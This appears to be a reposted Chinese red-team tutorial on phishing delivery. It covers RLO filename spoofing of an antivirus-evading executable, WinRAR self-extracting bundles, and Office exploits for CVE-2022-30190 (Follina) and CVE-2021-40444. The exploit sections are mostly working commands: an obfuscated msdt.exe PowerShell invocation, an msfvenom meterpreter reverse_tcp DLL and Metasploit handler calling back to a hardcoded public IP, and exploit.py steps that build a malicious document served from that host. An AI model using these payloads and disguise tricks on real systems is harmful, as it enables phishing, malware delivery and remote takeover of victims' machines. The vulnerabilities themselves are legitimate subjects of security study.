【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

这篇具有很好参考价值的文章主要介绍了【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

文件后缀-钓鱼伪装-RLO

经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
成功上线
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
后续修改图标,进行钓鱼伪装

压缩文件-自解压-释放执行

演示环境:Winrar压缩软件

【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office

【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑,# 红队APT,microsoft,windows,APT,Office
打包后进行RLO隐藏,主要是免杀问题

Office套件-CVE漏洞-MSF&CS

Microsoft MSDT CVE-2022-30190 代码执行

https://github.com/JohnHammond/msdt-follina
该漏洞首次发现在2022年5月27日,由白俄罗斯的一个IP地址上传。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,
通过ms-msdt MSProtocol URI方法来执行恶意PowerShell代码。感染过程利用程序msdt.exe,该程序用于运行各种疑难解答程序包。
此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。
目前已知影响的版本为:

office 2021 Lts office 2019 office 2016 Office 2013 Office ProPlus Office 365

测试:

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

复现上线CS:
https://github.com/JohnHammond/msdt-follina
1、生成后门上传
2、构造下载地址
3、修改代码下载
4、生成恶意文档

Microsoft MSHTML CVE-2021-40444 远程代码执行

https://github.com/lockedbyte/CVE-2021-40444

影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本

1、安装依赖:

apt-get install lcab

2、生成DLL:

msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=9999 -f dll > shell.dll

3、监听上线:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 9999
run

4、生成文档:

cp shell.dll CVE-2021-40444
cd CVE-2021-40444
python3 exploit.py generate shell.dll http://47.94.236.117:10000

5、监听文档:

python3 exploit.py host 10000

6、取出文档执行测试

CVE-2017-11882

影响版本:
office 2003 office 2007 office 2010 office 2013 office 2016文章来源地址https://www.toymoban.com/news/detail-649520.html

到了这里,关于【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [CVE-2022-30190]MICROSOFT OFFICE MSDT代码执行漏洞

    MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一个Windows实用程序,用于排除故障并收集诊断数据以供专业人员分析和解决问题。 Shadow Chaser Group 的研究人员在 Twitter 上表示,这个存在于Microsoft Support Diagnostic Tool中的漏洞已经于4月 12日报告给微软,并已经证明该漏洞

    2024年02月04日
    浏览(42)
  • CVE-2022-30190:Microsoft Office MSDT Rce漏洞

    读者需知 本文仅供学习使用,由于传播和利用此文所造成的损失均由使用者本人负责,文章作者不为此承担责任 目录 简介 影响版本 复现过程 风险危害 修复意见 MSDT(Microsoft Support Diagnostics Tool,微软支持诊断工具)是一个Windows实用程序,用于排除故障并收集诊断数据以供

    2024年02月05日
    浏览(62)
  • MICROSOFT OFFICE MSDT操作系统命令注入漏洞(CVE-2022-30190)

    目录 漏洞概述 受到影响的产品和版本 漏洞复现 1、搭建靶场 2、攻击复现 一、执行系统程序 二、执行系统命令 修复 Microsoft Windows Support Diagnostic Tool是美国微软(Microsoft)公司的收集信息以发送给 Microsoft 支持的工具(Windows上的微软支持诊断工具中存在此漏洞)。当从Word等

    2024年02月06日
    浏览(35)
  • CVE-2022-30190分析以及复现和POC利用 //Microsoft Office MSDT 远程代码执行漏洞

    在微软官方的介绍里,是从 Word 等调用应用程序使用 URL 协议调用 MSDT 时存在远程执行代码漏洞。成功利用此漏洞的攻击者可以使用调用应用程序的权限运行任意代码。 意思是恶意 Word 文档可以使用远程模板功能从远程服务器获取 HTML 文件,并且 HTML 代码可以使用 Microsoft 的

    2024年02月04日
    浏览(64)
  • 实战红队挖掘漏洞---用友时空KSOA v9.0版本ImageUpload任意文件上传漏洞+getshell

    前言,本次笔记是记录在工作中的打红队时挖到的用友时空KSOA任意文件上传漏洞。 emmm,怎么说呢,就是又在一次加班码到晚上十点的时候,挖掘到了一个用友时空ksoa v9.0文件上传漏洞。 大家先看看长什么样吧,大概就这样!版本这么明目张胆的就展现在我面前,不找一下这

    2024年02月08日
    浏览(47)
  • APT攻击与零日漏洞

    当谈到网络安全时,APT( 高级持续性威胁 )攻击是最为复杂和难以检测的攻击类型之一。APT攻击通常涉及到高度的技术和策略性,而且它们的目标是深入地渗透和长时间地隐藏在目标网络中。 高级持续性威胁 (APT)是一种网络攻击,其中攻击者为了长期目的而非短期益处进

    2024年02月07日
    浏览(57)
  • CVE漏洞复现-CVE-2022-22965-Spring-RCE漏洞

    Spring framework 是Spring 里面的一个基础开源框架,其目的是用于简化 Java 企业级应用的开发难度和开发周期,2022年3月31日,VMware Tanzu发布漏洞报告,Spring Framework存在远程代码执行漏洞,在 JDK 9+ 上运行的 Spring MVC 或 Spring WebFlux 应用程序可能容易受到通过数据绑定的远程代码执行

    2023年04月21日
    浏览(58)
  • ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031)漏洞解决办法

    ICMP“EtherLeak”信息泄露漏洞(CVE-2017-2304) ICMP“EtherLeak”信息泄露漏洞(CVE-2021-3031) 漏洞解决办法            

    2024年02月12日
    浏览(47)
  • Ubuntu或Debian系统的漏洞修复:apt安装包管理工具

    在阿里云主机管理后台-安全云中心,会看到系统最新的公布漏洞。 对于系统软件漏洞,我们还是要早做修复,防患于未然。 但安全云中心的功能大部分需要付费,包括一键修复,自己修复软件漏洞怎么操作呢? 其实很简单,只需要链接ssh,然后用apt安装包管理工具进行软件

    2024年04月27日
    浏览(36)
  • CVE漏洞复现-CVE-2019-5736 Docker逃逸

    Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化,容器是完全使用沙箱机制,相互之间不会有任何接口 Docker环境和普通生产环境的差异在哪呢?举个列子,

    2024年02月12日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包